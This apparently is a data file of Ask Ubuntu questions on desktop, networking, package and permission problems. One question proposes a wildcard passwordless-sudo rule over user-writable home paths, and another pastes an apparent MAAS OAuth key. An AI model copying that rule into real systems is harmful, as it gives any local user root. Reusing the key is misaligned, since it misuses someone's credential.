194043	problem in installing youtube unity lens	i was trying to installing youtube lens and scope from ubuntu . i typed the following in the terminal : sudo add-apt-repository ppa : atareao/lenses sudo apt-get update & & sudo apt-get install lens-video scope-youtube the output is : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package lens-video
194045	mini tube , youtube app wont show any videos	does anyone use minitube for there youtube videos ? i downloaded this but it does not show any videos just descriptions where the video would be any ideas whats wrong ?
194057	scrot ( screenshot ) cron job not executing	i 'm trying to execute a cron job with scrot ( screenshot utility ) but it wo n't work . at first i thought it was a directory problem . i wrote my.png by itself at first , which could have been dropping it anywhere . so i changed the command to use the absolute paths . since i 've defined absolute paths , it seems like it would have to work correctly , but it 's not . if i try to execute this as written on the command line , it works . 32 8,14,16 * * 1-5 /usr/bin/scrot /home/johndoe/my.png what am i doing wrong ? note that the times are not the problem , i keep putting it one or two minutes ahead of the current system time to test , and for other commands , it works fine .
194062	how can i replace ubuntu branding with my own ?	how can i replace the ubuntu branding with my own ? what files need to be replaced ?
194064	trying to install spotify but it says i need a non administrator account	when i try to install spotify with wine , it says i need to use a standard account . i switched my account from administrator to standard , and restarted , but i still get the same message . any help is appreciated .
194066	lenovo thinkpad edge e430 battery problem	on ubuntu 's web page , in the certified hardware section , it is listed lenovo . http : //www.ubuntu.com/certification/ so i decided to buy a thinkpad from lenovo . just one month after i bought the notebook , the battery got a problem and it does not charge anymore . now lenovo wo n't give me any support because i am using ubuntu . lenovo says they will give support only for windows users because their tools runs on windows . they refused to change my battery before running the windows based test . what should i do ?
194067	transmission dependencies are not in repository	i 'm running ubuntu 12.04 using gnome3 through their ppa in launchpad . went good until now . today ubuntu wanted to make some updates and i thought okay . but it did n't want to install all of them . turned out there were not all dependencies in the ppa . before i noticed that , i ( noob : d ) uninstalled ( apt-get purge ) transmission in order to reinstall it . bad idea , because now i ca n't install it , even using synaptics . the problem : it seems like the only ppas that have transmission in it are the one from gnome3 team ( not all packages included according to synaptics , v2.71 ) and the official ( transmission-common missing , v2.61 ) . so when i try to install a package it says that transmission-common is too new . i ca n't even find the version that should be somewhere in the official standard ubuntu ppa . installing from the software center does n't work either . why are n't all dependencies in the ppas or why ca n't i see them ? how can i install transmission ( stable , newest version ) again ? and why has the gnome3 team a newer version as the stable ppa of transmission ? are they including beta software ? if you need any additional information just tell me . sorry i think it 's quiet confusing what i did there . thanks in advance . edit1 okay sorry , i should have explained better . when i try to install it tells me something of dependency problems . when i try sudo apt-get install ... it says : die folgenden pakete haben unerfüllte abhängigkeiten : transmission-cli : hängt ab von : transmission-common ( = 2.61-0ubuntu0.12.04.1 ) aber 2.71-0ubuntu1~precise1 soll installiert werden transmission-daemon : hängt ab von : transmission-common ( = 2.61-0ubuntu0.12.04.1 ) aber 2.71-0ubuntu1~precise1 soll installiert werden transmission-gtk : hängt ab von : transmission-common ( = 2.61-0ubuntu0.12.04.1 ) aber 2.71-0ubuntu1~precise1 soll installiert werden e : probleme können nicht korrigiert werden , sie haben zurückgehaltene defekte pakete . unfortunately i 'm using ubuntu in german . here a picture of synaptics ( i did n't know how to show better ) : https : //dl.dropbox.com/u/8240739/synaptic-paketverwaltung % 20_002.png maybe it helps .
194069	setting default ubuntu eth port	background : i have a desktop computer running ubuntu 12.04 . i have installed drbl to handle dhcp server and clonezilla server . i have a network card in my desktop with 2 ports in it . these 2 ports are bonded together and are used by drbl . there is a 3rd port integrated in the motherboard . i want to use this 3rd port for internet . drbl knows that this is set for internet . edit : `` ubuntu network-manager has stopped recognising the connections ( device not managed ) . '' - i have now uninstalled network-manager . it use to say that eth1 was default ( first port in the network card ) i want eth0 to be default as that is the internet port . question : how do i make eth0 as the default port without using network-manager ?
194071	ubuntu not being displayed in the windows boot manager	i download an iso file and installed ubuntu 12.04 from a usb , i had windows -7 installed already on c drive , i installed ubuntu on e drive ( sda5 ) , after the installation completed , it asked to restart , then i restarted , but the machine automatically loads windows-7 , ubuntu does n't show up , help me out please ! okk , my machine does n't support cd 's , so can i do this boot repair without any live cd !
194074	enabling ssl in mysql	i 'm running ubuntu server 12.04 , and i want to enable ssl connections to mysql . i 've generated the following keys/certs files with openssl : ca-cert.pem server-cert.pem server-key.pem i stored these at /etc/mysql , then added added the following lines to /etc/mysql/my.cnf : ssl-ca=/etc/mysql/ca-cert.pem ssl-cert=/etc/mysql/server-cert.pem ssl-key=/etc/mysql/server-key.pem next , i restarted the server with sudo service restart mysql . however , this does n't seem to enable ssl . within a mysql session : mysql > show variables like ' % ssl % ' ; + -- -- -- -- -- -- -- -+ -- -- -- -- -- -- -- -- -- -- -- -- -- -- + | variable_name | value | + -- -- -- -- -- -- -- -+ -- -- -- -- -- -- -- -- -- -- -- -- -- -- + | have_openssl | disabled | | have_ssl | disabled | | ssl_ca | /etc/mysql/ca-cert.pem | | ssl_capath | | | ssl_cert | /etc/mysql/server-cert.pem | | ssl_cipher | | | ssl_key | /etc/mysql/server-key.pem | + -- -- -- -- -- -- -- -+ -- -- -- -- -- -- -- -- -- -- -- -- -- -- + any ideas what i 'm missing ? thanks
194078	java does n't show up in firefox plugins	i 've just installed the newest java , because firefox blocks the old version . i used the tutorial from http : //www.backtrack-linux.org/wiki/index.php/java_install because i had some trouble once , i knew that there are multiple library folders , so i linked into all mozilla plugin folders that there are . /root/.mozilla/plugins /usr/lib/firefox/plugins/ /usr/lib/firefox-addons /usr/lib/mozilla/plugins /usr/lib64/mozilla/plugins java -version returns java version `` 1.7.0_07 '' java ( tm ) se runtime environment ( build 1.7.0_07-b10 ) java hotspot ( tm ) 64-bit server vm ( build 23.3-b01 , mixed mode ) but when i go to firefox plugins , it 's not listed . what do i need to do , so that firefox recognizes java ?
194079	black screen on login page	when i startup my ubuntu 12.04 installed on a z77 pro4 ( asrock motherboard ) , crucial m4 ssd drive ( sata 3 ) , and intel i5 3570k ( ivy bridge ) , i get this black login screen : i also hear the ubuntu login sound `` tic toc '' but the screen is black , and if i type in some text , only strange characters appears ( as you can see on the picture ) . do you have any idea ? thanks . ps : this is an evolution of a previous problem exposed here
194081	how to use 11gb ssd	i 've buy a toshiba u840 with a hdd of 320gb and an ssd of 11gb . i 'm going to dual-boot win7 and ubuntu . i 'll make three partition , one for win7 , one for / ubuntu and the last for shared-data . my question is , how could i use ssd ? now is used by windows for hybernation , could i use for linux /boot , or /var ?
194085	reduce mp3 size from terminal ?	hi is there any way to reduce the size of mp3 file from terminal ? i am using ubuntu 12.04 .i would like to have it only terminal methods not in gui ways . thank you in advance .
194086	juju bootstrap key error ?	i followed the guides the best as i could . there is some information missing like do as root or as regular user ..formatting , quotes no quotes..what the password or paraphrase for ssh should be ..couple other trivial things . that im sure add up to where im at ( stuck ! ) so i have a working mass server on mx-nas-01 and 3 nodes and have been trying to get juju to start . i have tried this as both root and my regular account , sudo no-sudo and here is the output i get from juju bootstrap ( however i try it ) i do n't know if this could be a host , domain , account issue or what i will mention i did have to shut off my dhcp server and install masq ( all defaults ) to get the maas pxe to work for the nodes mxdog @ mx-nas-01 : / $ juju bootstrap traceback ( most recent call last ) : file `` /usr/bin/juju '' , line 8 , in < module > main ( sys.argv [ 1 : ] ) file `` /usr/lib/python2.7/dist-packages/juju/control/__init__.py '' , line 183 , in main env_config.load_or_write_sample ( ) file `` /usr/lib/python2.7/dist-packages/juju/environment/config.py '' , line 229 , in load_or_write_sample self.load ( ) file `` /usr/lib/python2.7/dist-packages/juju/environment/config.py '' , line 115 , in load self.parse ( file.read ( ) , path ) file `` /usr/lib/python2.7/dist-packages/juju/environment/config.py '' , line 138 , in parse config = schema.coerce ( config , [ ] ) file `` /usr/lib/python2.7/dist-packages/juju/lib/schema.py '' , line 266 , in coerce new_dict [ k ] = self.schema [ k ] .coerce ( v , path ) file `` /usr/lib/python2.7/dist-packages/juju/lib/schema.py '' , line 233 , in coerce new_subvalue = self.value_schema.coerce ( subvalue , value_path ) file `` /usr/lib/python2.7/dist-packages/juju/lib/schema.py '' , line 301 , in coerce return self.schemas [ selected ] .coerce ( value , path ) keyerror : 'mass' environments : maas : type : mass mass-server : http : //192.168.0.30:80/maas mass-oauth : tdrdtjeekvarbh93et : n5dk5hszbsa45cbdx9 : s8wmnrfkt9peyvqn9yrnbhgxmkarv8vb admin-secret : # # # # # # # # # # default-series : precise
194089	how to associate rdp extension to open remote desktop client on 12.04 ?	the tsclient application used to work for opening .rdp files , but remmina does not seem to work the same way . does krdc , remote desktop viewer or some other application work ? i 'm using precise pangolin ( ubuntu 12.04 lts ) . i used tsclient successfully on 9.04 ( jaunty jackalope ) by associating /usr/bin/tsclient . the problem is intranet-published web pages have the .rdp files , which are needed to download and launch the terminal server client or remote desktop client automatically . the tsclient had the features and functionality needed , but tsclient is no longer in the repository and is difficult to get all of the dependencies met . i got these compiling errors for tsclient-2.0.1 with the latest libnotify and libnm_glib packages installed : no package 'libnotify ' found no package 'libnm_glib ' found
194090	recovering data from /	i accidentally installed ubuntu to one of my data drives from windows . the drive was a ntfs drive and contained about 80 gb of important data . the size of the drive is 110 gb . its new file system is ext4 . in an attempt to recover the data , i downloaded foremost and tried the following commands : foremost -i / -o /media/281c8db01c8d7998/recovery/ -t -v foremost -i /dev/sda7 -o /media/281c8db01c8d7998/recovery/ -t -v ( sda7 is the drive in question . ) it appears that with either command , foremost gets stuck reading some file . here is the console output : abhi @ abi-pc : /dev $ foremost -i /dev/sda7 -o /media/281c8db01c8d7998/recovery/ -t -v foremost version 1.5.7 by jesse kornblum , kris kendall , and nick mikus audit file foremost started at fri sep 28 20:58:00 2012 invocation : foremost -i /dev/sda7 -o /media/281c8db01c8d7998/recovery/ -t -v output directory : /media/281c8db01c8d7998/recovery_fri_sep_28_20_58_00_2012 configuration file : /etc/foremost.conf processing : stdin | -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- file : stdin start : fri sep 28 20:58:00 2012 length : unknown num name ( bs=512 ) size file offset comment killed as you can see i have to kill it from system monitor . this approach does not seem to be working . what else could i try to recover the files ? please help . the files are very important and i will be devastated if i can not recover them . edit : some more information : abhi @ abi-pc : ~ $ sudo fdisk -l /dev/sda [ sudo ] password for abhi : disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x4f3e2fb9 device boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 205004799 102398976 7 hpfs/ntfs/exfat /dev/sda3 205004800 512409599 153702400 7 hpfs/ntfs/exfat /dev/sda4 512411646 976771071 232179713 f w95 ext 'd ( lba ) /dev/sda5 512411648 731011071 109299712 7 hpfs/ntfs/exfat /dev/sda6 731013120 734136319 1561600 82 linux swap / solaris /dev/sda7 734138368 976771071 121316352 83 linux abhi @ abi-pc : ~ $
194092	mediamonkey ratings imported into rhythmbox/banshee/quod libet	i recently made a complete shift from windows 7 to ubuntu 12.04 . everything went smoothly until i scanned my music files in some of the ubuntu players ... all of my ratings added in windows , using mediamonkey , were out-of-five-stars ( some with a half-star precision ) - but when imported into rhythmbox , banshee and quod libet , they all changed to a out-of-four-stars rating , with no five-star songs and no indication of how the old ratings were mapped into the new system . does anyone know how to fix this ? even getting to know which way the ratings were mapped from 5-star system ( with a half-star increment ) to a 4-star basis will be very helpful . thank you !
194095	gnome classic 's clock on unity	i really like the gnome classic 's clock indicator . is it possible to install/use it in unity ? example :
194102	reducing power consumption of second hdd	i 'm getting a laptop tomorrow with an ssd as the primary ( operating system ) drive , and i will be putting my old laptop 's hdd into it as a secondary drive for holding music etc . since hdds use power when idle , just to keep themselves spinning , i was wondering what the optimum settings for 'spinning down ' the drive might be , as well as any other tips . i remember seeing reference to a settings file where i would be able to choose how long the drive can sit idle for before spinning down , but i do n't know where it was . additionally , if the drive uses an ntfs file system , will the system write or read anything from the drive by itself which could prevent the spin-down from happening ? i was intending to permanently mount it using the installer to /windows , but would be open to any better methods if this would cause a problem . thanks for any assistance .
194107	how do i add the `` user and groups '' application ?	i once installed this ( gnome thing ? ) wich gave me an easy access to users groups and advanced settings . but now after reinstalling ubuntu 12.04 i canâ´t find the command line anymore . does anyone know what i mean ?
194111	how save my `` alias '' entries forever	i want to save my alias commands forever like the default ones when i type `` alias '' so i do n't retype them every time i leave my bash
194113	how can i get a gnome environment in my vnc session ?	when i start vnc i have an empty desktop without the ability to manage windows or start apps etc ) . i 'd like to have a desktop environment to be able to basic desktop things ( someone asked me why i wanted this - i ca n't really say except that i would like my computer to be useful ) . my focus at the moment is basically having a working environment with as little time/effort expenditure as possible , as opposed to spending a full-time week learning the most trivial and arcane details of x , vnc , gnome or whatever passes for the current desktop architecture standard of the hour . what command or series of hoops do i have to jump to to achieve this ? i have tried running gnome-session but it looks like it is attempting to run compiz and fails spectacularly . i 've also tried running metacity but this simply gives me a titlebars to my windows ( this is great ! but i 'd also like the taskbar and other stuff ) . i considered trying to start gnome-session in a way that it uses metacity instead of compiz . but i do n't know how to do this . tutorials on the net exist for changing to metacity - once you already have compiz running . not so useful if compiz does not run .
194115	run script at user login as root , with a catch	i 'm trying to run a php script as root on user login . the php script adds a samba share to the samba config , thus the need for root privileges . the only issue here , is that the user does n't exist yet . this system is integrated with active directory . so when a user logs in for the first time , a home directory for them is created under /home/domain/username . i 've found this question and that seems like the correct way to get what i want , but i 'm having trouble with the syntax since i do n't know the user 's name . would it be something like : all all= ( all ) nopasswd : /home/domain/*/createsambashare.php this does n't seem to work as it is currently . anyone have any ideas or a `` scripted '' way to add a samba share on user login ? since i 've made other changes to /etc/skel , i just added the bash necessary to run the php script in .profile in there . this then gets copied to the `` new '' user 's home and it tries to run the php script . but it fails , because these are not privileged users . changing permissions on the php script will not help . it needs to be run as sudo because it opens the samba config file for writing . letting any user run the php script would result in a php error . the homes samba directive does n't work for my use case . i need the samba share to exist once they exist on the server , even when they 're not logged in .
194124	how to get language variables ( desktop folder name , document folder name , etc.. )	i am making a script and i am looking for a way to get the variable names for desktop , music , documents , pictures and others folders . depending on the language they change . for example desktop in spanish is escritorio . so how can i get the folder directory without needing to find out what language the user is using or having to make several if statements for each language .
194125	how do i create a cairo-dock launcher for sage ?	i have sage installed via the instructions given on the page https : //help.ubuntu.com/community/sage and i tried to follow the instructions for getting a desktop icon but i could n't understand them . would someone please walk me through it ?
194129	how do you delete files in the location : /usr/local/src ?	i tried to move a file into the rubbish bin ( because i followed some instructions about installing sage and it involved moving a file to that directory ) and it gave me errors saying that i did n't have permission . even though i 'm signed in as an administrator .
194130	how to reverse file ownership and permission settings	i installed lamp and wordpress on my system a week ago . since i could n't create child themes in wordpress and work with php folders for my other projects collocated in var/www without using nautilus i wanted to solve the permissions issue . i hoped to bring a solution carrying out the commands on this page for my wordpress folder : http : //wiki.apache.org/httpd/filesystempermissions . this allowed me to play with any file in the folder like creating and modifying .css files through wp admin , etc . but after a restart i discovered that i ca n't change dns settings of my network connections in the list anymore because it is asking me the root password and even though i enter the password it does n't let me do the action giving `` insufficient privileges '' error . can you help me correct the mistake i possibily made during the configuration and , maybe , configure again the permission and ownership settings for var/www/somefolder as it is adviced to be configured under general circumstances ? thanks in advance !
194133	gnome fallback session has both top and bottom panels also unity launcher running through them	i have the gnome fallback session installed and when i log into it i get both the top and bottom panels and also the unity launcher and it overlays both and makes it look funny . it is the unity 2d session 's launcher that shows up . i was wondering how to fix this ?
194139	what 's the best way to search my file system on ubuntu with instant results ?	what 's the best way to search my file system on ubuntu and get results almost instantly ? i have used catfish , tracker and the usual search tool provided with ubuntu . tracker finds nothing , ubuntu search tool is too slow and catfish most of the time finds nothing . i have a lot of pdfs and djvu files that i want to access . in windows , there is a program called search everything that returns results almost instantly . i want a similar linux tool . please provide a detailed answer as possible as i 'm a newbie in linux . if such a tool does n't exist in ubuntu , what 's the chance that i can find such tool in other linux distribution e.g mandriva , redhat ?
194142	how install eclipse from .tar.gz file ?	i have downloaded eclipse-jee-juno-linux-gtk.tar.gz file , but i do n't know how install it .
194147	minecraft program frame rate is very slow	i have recently downloaded minecraft to ubuntu 12.04 . it launches and plays successfully , however- the frame rates for the game are extremely slow . they never go past 9 fps and usually drop below 3 fps . i have been a windows xp user for years and have just recently switched to ubuntu , so i 'm not an expert with this os . my video card is a diamond stealth s60 with radeon 7000 . i do n't know what other information you guys need but if you ask for it , and would please tell me how to get to it , i will tell you as soon as i can . thanks for your help .
194151	how do you install the latest version of gnu octave ?	yet again i am to turn to this wonderful resource available to me and ask , how do i install the latest version of gnu octave ( not octave 3.2.4 -- the one available in the software centre ) ?
194154	history | grep `` keyword2find '' does not gives unlimited history	the command history | grep `` keyword2find '' does not gives unlimited history that i typed in the terminal onwards i installed ubuntu . i want to see all of them without a time span .
194157	how to install vst plugins with wine	i have fl studio 10 installed on my pc through wine and it works perfect . the pre-installed vst 's work but any i install ( sylenth1 , nexus2 and pianoteq ) do n't work . i have massive installed and it works . i am a little new to linux but know the basics .
194161	prizes for app showdown winners	i 'm the winner of app showdown community vote . i 'm just curious about the question : when the prizes will be presented ? i found no information about it .
194162	issues with dz77bh-55k motherboard and i7 processor on 12.04	i just built a computer with intel 's dz77bh-55k motherboard with i7-3770 processor . on 12.04 , 11.10 , and 11.04 and linux mint 12 , the computer has been really laggy . the graphics are n't working ( choppy effects , bad resolution ) and the keyboard and mouse inputs are even laggy and unreliable ( skips keystrokes ) . i 'm not sure what the problem is or what i can do to fix it . i tried sudo apt-get install mesa-utils but nothing changed . i 've also messed around in the bios but no luck there either . any ideas ? could it possibly be a hardware issue ?
194167	ubuntu start up screen broken	i set up dual boot on my extra pc last night . first installed windows 7 and that went just fine . downloaded ubuntu and then did the md5sum and did not get a correct return that were listed on the site . i forgot to do that before i burnt the image to a disc , so i booted from the disc anyway to do the intergrity check and no errors were found . i then installed and everything seems fine except when it 's booting , the purple screen is broken . should i try to redownload and re install ?
194175	how to get gnome shell 3.6 in ubuntu 12.04 ?	simple as install gnome shell 3.6 on ubuntu 12.04 ? some ppa ?
194185	does changing my launchpad gpg key require any changes to my ppas ?	i 've lost my gpg key which was used to sign my ppa . so , i generated a new key and deactivated old one in launchpad . now , i would like to change the key which is used to sign repository . currently the ppa is unavailable duo to invalid gpg signature . my ppa : https : //launchpad.net/~soroush-r/+archive/geopsy-deb
194187	running picasa from a windows partition	is it possible to run picasa directly from at windows installation ( on a dual boot partition ) or do you have to make a installation of picasa in combination with wine in ubuntu ? actually it looks like wine can handle picasa on my windows partition , but is there any disadvantage in doing that ?
194189	mic on cam do n't work	the cam works . i pull up pulseaudio i can see it pick me up for 1sec then stops . do n't work on skype i 've tried every usb port same thing it worked on 10.04 fine . but now i 'm on 12.04 and it do n't work . it is a logitech b500 desktop : ~ $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 002 : id 046d:0807 logitech , inc. webcam b500 bus 003 device 002 : id 03f0:6104 hewlett-packard deskjet 5650c bus 005 device 002 : id 046d : c51b logitech , inc. v220 cordless optical mouse for notebooks i have changed some setting in flash player settings manager , i do n't think it would affect it after all the cam is still working it 's the microphone that freezes up , but thought i would tell you this , info is good .
194191	bluetooth does n't work on macbook pro 9.1 . magic mouse strangely does kind of work ( picture + hardware provided ! )	i recently installed ubuntu 12.04 lts on my mid-2012 15 '' ( non-retina ) macbook pro . at first the wi-fi was n't working but i found a quick fix for that . the problem i 'm now having is that i ca n't enable bluetooth . when i go to `` system settings '' and then `` bluetooth '' it looks like this : http : //i.imgur.com/geuol.png . i ca n't flip the switches , `` blueman '' also does n't work ( all buttons greyed out ) . in the 'additional drivers '' nothing gets returned ... i have an html file of my hardware ( sanitized file ) , you can find it here : http : //www.2shared.com/document/evo9oorj/myhardware.html . really hope this can be fixed . i powered my magic mouse on and strangely enough it kind of works . left and right buttons work , but i ca n't scroll/ perform multitouch gestures . the magic mouse turns up nowhere ... there 's also no bluetooth symbol in the upper bar ... thanks in advance
194193	why do i get `` undefined reference '' errors when linking against openssl ?	my compilation process throws around errors like ..undefined reference to `bn_cmp' although i include < openssl/bn.h > and run gcc -lssl -lcrypto test.c -o test can someone help ? ( openssl libssl1.0.0 , libssl-dev are installed )
194201	remove ubuntu from dual boot windows 7 both in same drive	i have installed ubuntu as dual boot with windows 7 . i didnt had any partition for ubuntu . now i have to remove ubuntu . how do i do so ? ? pls help . it is urgent
194204	how can i talk to a gtalk user with skype ?	are there any ubuntu based applications that will allow google talk users talk to skype users ?
194205	how to get back applications menu ?	i 'm using 12.04 , classic desktop without effects . once the indicator-applet-complete ( right part of the top panel ) had disappeared . i found how to fix it with alt-win-rightmouseclick on the panel , then `` add to the panel '' , where choose `` indicator applet complete '' to add . now , the left part of the top panel ( applications menu ) has disappeared ! if i do alt-win-rightmouseclick on the panel , i can add only individual menu sections like internet , office , settings etc . how to get back the full menu ?
194211	skype+gnome 3 answer directly in systray ?	is there a way ( as the pidgin integration plugin ) to answer directly to skype conversations via the systray ? thanks .
194214	monitor not turning off when screen saver is on	i installed ubuntu for the first time 3 weeks ago and i really love it . i have ubuntu 12.04 . my only problem is that when screen saver is on , it just shows blank screen , and not turning off the monitor , so my monitor is always on . i have samsung e2220 - 22 '' . i looked over the web and i found this command : sudo xset dpms force off this command shuts down my screen so i do n't see a reason why the screen saver ca n't shut it down . thanks a lot ! elad
194218	specific function keys not working	my toshiba c800 laptop ( 12.04 lts desktop ) has special function keys as follows : fn + : f2 - > brightness down f3 - > brightness up f4 - > display select f5 - > touch pad on/off f6 - > previous f7 - > play/pause f8 - > next f9 - > volume down f10 - > volume up f11 - > mute f12 - > wifi on/off f6 to f11 ( media player keys ) work correctly , but the keys from f2 to f5 and f12 are not working . why would some function keys work , but not others ? what can be done to fix this ?
194221	how to configure which lenses appear in the dash home screen ?	i have about 8 lenses installed . some of them ( everpad , askubuntu ) i 'd like to appear on the dash home page , and others ( downloads ) that are on the home page i would like to not be there . anyway to configure this ?
194222	how to fix autohide issue with the unity launcher ?	when autohide is toggled on , the unity launcher wo n't show up unless i press the super key . this problem is present in unity and unity 2d . the launcher worked properly before but for some reason it is n't working as it should any longer .
194225	disable printing extraneous job info when i print a images	as of 10/11/12 i this is still a problem . peterling , that link you gave me was for windows . not ubuntu . i need to know how to do this in ubuntu . whenever i print off an image , before the actual image prints , i get these weird `` print job '' sheets . ( i named them that , because i do n't know what else to call them . ) they say something like : media limits : 0.12 x 0.38 to 8.38 x 10.38 inches job id : officejet-pro-l7700-64 driver : hp-officejet_pro_17700.ppd driver version : description : hp officejet pro l7700 make and model : hp officejet pro l7700 , hpcups 3.12.2 printer : officejet-pro-l7700 created at : fri sep 28 14:12:53 2012 printed at : fri sep 28 14:12:53 2012 how do i fix this so the page does n't print ?
194227	kvm host : ubuntu 12.04 3.2 kernel showing incorrect `` cache size '' in cpuinfo ?	2x xeon e5620 . 16 cores altogether . /proc/cpuinfo shows cache is only @ 4096kb according to intel this should have 12mb of `` smart cache '' . doing searched for e5620 and cpuinfo shows the correct number : cache size : 12288 kb however mine shows this : processor : 15 v endor_id : genuineintel cpu family : 6 model : 44 model name : intel ( r ) xeon ( r ) cpu e5620 @ 2.40ghz stepping : 2 microcode : 0x1 cpu mhz : 2400.104 cache size : 4096 kb fpu : yes fpu_exception : yes cpuid level : 11 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush mmx bogomips : 4800.20 clflush size : 64 cache_alignment : 64 address sizes : 40 bits physical , 48 bits virtual this is under a kvm kernel as a baremetal guest . lscpu shows this : architecture : x86_64 cpu op-mode ( s ) : 32-bit , 64-bit byte order : little endian cpu ( s ) : 16 on-line cpu ( s ) list : 0-15 thread ( s ) per core : 1 core ( s ) per socket : 1 socket ( s ) : 16 numa node ( s ) : 1 vendor id : genuineintel cpu family : 6 model : 44 stepping : 2 cpu mhz : 2400.104 bogomips : 4800.20 hypervisor vendor : kvm virtualization type : full l1d cache : 32k l1i cache : 32k l2 cache : 4096k numa node0 cpu ( s ) : 0-15 kvm seems to be stealing some cpu cache . why is this ? .
194229	youtube has lag ( freezes ) on gnome	youtube is not working well at firefox and chrome , midori works fine , this damage is lesser when i tested kde . the video stops for seconds but not the audio and when it backs it reproduce all the video in fast forward till it catches the audio . ubuntu 12.04
194237	how to enable gallium driver and remove radeon xorg driver , vesa , etc	how to remove radeon xorg driver , vesa etc . and enable de default gallium driver ?
194238	getting xbox live via a wired network with my laptop that has internet access wirelessly	i 'm running the latest version ( as of yesterday anyways ) of ubuntu desktop 64bit , but installed on my laptop if it makes a difference . i had windows 7 preinstalled when i bought it and it worked fine with the wireless from my house and bridging the connection with a lan to my xbox for live . now with ubuntu i tried the same setup , but i 'm unfamiliar with ubuntu so i did n't get far . best i got so far is wireless internet on my laptop and a wired connection to the xbox that continually connects and disconnects . heres my network settings . if theres fields not included its because theyre empty on mine or theyre my mac address or network password wireless network 1 settings : connect automatically : checked . available to all users : checked wireless : ssid : franco's mode : infrastructure mtu : automatic ipv4 settings : method : automatic ( dhcp ) ipv6 settings : method : automatic wired network 1 : connect automatically : checked available to all users : checked wired : mtu : automatic ipv4 settings : method : automatic ( dhcp ) ipv6 settings : method : automatic any help would be greatly appreciated . edit : 6:26pm it seems to be staying connected now . doing the network test on my xbox it pickups the network , but can not detect any pc . restarting the xbox , however , leaves my computer unable to connect bringing up the wire network disconnected 'blip ' every minute or so again . before i had restarted the xbox it said `` connected 100 mb/s '' . now it only says `` connecting '' . i did have my computer and xbox on in this wired network disconnected blip cycle for a long period of time so it may have finally connected , just without the ability to detect my laptop . i left for 2 hours or so in the middle of typing up the original question . i finished posting this when i got back and then tried to mess with it a bit again , in case youre wondering why i didnt include this before ... i 've said too much . forgive my long-winded fingers : p
194240	how to avoid upgrade restart	how can i avoid having to restart after an upgrade ? i usually lock kernel upgrades as well as all libc packages . however , from time to time , after an upgrade i still am requested to reboot so that upgrades are completed . so my question is : what packages do i have to lock in order to avoid an upgrade restart ?
194247	how can i connect 12.4 to the internet with wep key ?	i have ubuntu and i want to know how can i connect to the internet using my wep key for my wireless . i tried too many times but it does n't work . i have my wireless password but it does n't work too . can somebody help me ?
194250	ubuntu 12.04 transmission-daemon and zfsonlinux : bad file descriptor and corrupt pieces	i 'm running ubuntu 12.04 with zfsonlinux and transmission-daemon . the issues : sporadic bad file descriptor and piece # xxx is corrupt errors . after i recheck the torrent , everything seems fine . that happens only when downloading : once it 's in seeding mode . this only happens after the torrent client has been running for some time . i installed zfsonlinux from the official stable ppa . i previously tried running transmission-daemon from the ubuntu repository , but since i 've switched to building the latest transmission from source with the latest libevent ( all stable ) - same thing . i 've seen bug reports for that issue , but none of them seem to have a solution . how can i fix these errors or at least understand where they come from and what i can do to rectify the issue ?
194255	will my existing operating system be deleted ? or will ubuntu be installed alongside mac os x ?	is ubuntu safe to install ? will my existing operating system be deleted ? or will ubuntu be installed alongside mac os x ? does the installer automatically start when i reboot ? i read on another website that a user 's pc did n't run when he rebooted .
194263	benefits of installing compat-wireless ?	last week i had problems installing a wireless network adapter in ubuntu 12.04 , and searching at google many people recommend installing compat-wireless to solve problems of this type . my question is : what exactly is compat-wireless and what benefits brings ? are there other options for solving problems with wireless network adapters on ubuntu ?
194264	how do i change the line spacing in terminal ?	is it possible to change the line spacing in terminal , or is there some other app that allows it ? i 'm moving from the mac , and its terminal app has this feature which allows line spacing to be changed independent of the font size . e.g. , here 's monaco on the mac at 17pt , without any adjustments . my issue with it is that it 's a jumble of text - the eye is drawn vertically as much as it is horizontally : and with `` 1.1 '' line spacing and slightly tighter character spacing . i do this so that my eye follows lines easier . it 's a general rule of thumb in layout that space between lines should be larger than the space between words . this gets a little closer to that ideal : i 'm wondering how to achieve this with ubuntu . for now , my best workaround is to use source code pro , which is designed with these ideas in mind , apparently :
194267	ca n't install 12.04 inside windows 7 using wubi	i 've tried to install ubuntu inside windows 7 so many times , as the installation is done , a window pops up : an error occurred : nonetype ' object has no attribute 'get_info' for more information please see the log file here is my log : http : //pastebin.com/knwt92e6 please help me .
194271	booting from liveusb stops at purple screen	i followed the instructions for creating a bootable usb stick . when i attempt to boot from the usb , however , ubuntu will not fully run . i am able to get a plain purple screen with the word ubuntu in orange centered on the screen . have i missed a step or have i done something wrong ?
194272	can you give me a step by step guide to change folder ownership from root ?	i am really new to ubuntu and i 'm so confused , so please excuse my ignorance . i have two drives on my computer an 80gig and 500gb . i have ubuntu installed on the 80gb drive but have all my media on the 500gb drive . i have changed the directory setting for my music and video files to look at the 500gb harddrive instead of the original default folder on the drive that ubuntu is installed on . however , when i tried to add files to my music and video folders on the larger drive i apparently do not have permission to do that or modify the folder in anyway at all since it is owned by the root . i have tried a couple of suggestions posted in this forum but i ca n't seem to find anything that works and i keep getting operation not permitted . can someone please provide me with a step by step idiot 's guide to changing my permissions ? i really need some help because i am completely lost . maybe i have even set everything up incorrectly . i am willing to remount the drive or anything that 's necessary ( do n't worry i have everything backed up on an external drive ) ... help please ... .
